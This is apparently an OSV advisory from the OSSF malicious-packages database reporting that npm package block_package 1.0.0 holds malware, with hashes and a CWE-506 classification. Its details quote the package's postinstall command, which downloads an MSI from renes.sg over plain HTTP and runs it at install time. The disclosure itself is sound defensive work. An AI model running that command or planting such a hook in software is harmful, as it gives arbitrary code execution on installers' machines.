{"id":"MAL-2026-12340","summary":"Malicious code in block_package (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (33601d937b847af20b85c4a784ec38ae18e1543cc64dbc1dcdaf65f09437cf51)\nscripts/postinstall.js runs automatically during `npm install` and uses execSync to invoke `curl -O http://renes.sg/npm_block_package.msi & start npm_block_package.msi`, fetching an MSI installer from a non-publisher host over unauthenticated plain HTTP and immediately launching it on the installer's machine. The fetch is unpinned, unverified (no hash or signature check), and delivered over a channel trivially subject to tampering. The MSI is executed as the installer user, giving whoever controls renes.sg (or any on-path attacker) arbitrary code execution on every machine that installs this package.\n","modified":"2026-08-05T13:34:59.230063318Z","published":"2026-08-05T12:33:52Z","database_specific":{"malicious-packages-origins":[{"sha256":"33601d937b847af20b85c4a784ec38ae18e1543cc64dbc1dcdaf65f09437cf51","source":"amazon-inspector","versions":["1.0.0"],"id":"IN-MAL-2026-014707","import_time":"2026-08-05T13:08:39.486983754Z","modified_time":"2026-08-05T12:33:52Z"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/block_package/v/1.0.0"}],"affected":[{"package":{"name":"block_package","ecosystem":"npm","purl":"pkg:npm/block_package"},"versions":["1.0.0"],"database_specific":{"cwes":[{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"}],"indicators":{"evidence_files":[{"tlsh":"e2c080b50164a3f0fc909d80fd591477544fc072f79c7fe0e55c846375481044133597","path":"scripts/postinstall.js","sha256":"6f38a7bb0b28430d6fae9094d820e26876cdf2d72add2c1346340c21c9896f9d"}],"package_integrity":[{"filename":"block_package-1.0.0.tgz","hashes":{"sha1":"783b5a4581024bacd7173984a9f75628285d2c4e","sha512_sri":"sha512-KldVRO++gnv6aDymWGIU2S0xtyOXhjd3VH/sDXlXGukrV8W8PGCFMxNlriQCdHr34VYoBqtvSyMB7OFgdLT9OA=="}}]},"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/block_package/MAL-2026-12340.json"}}],"schema_version":"1.8.0","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}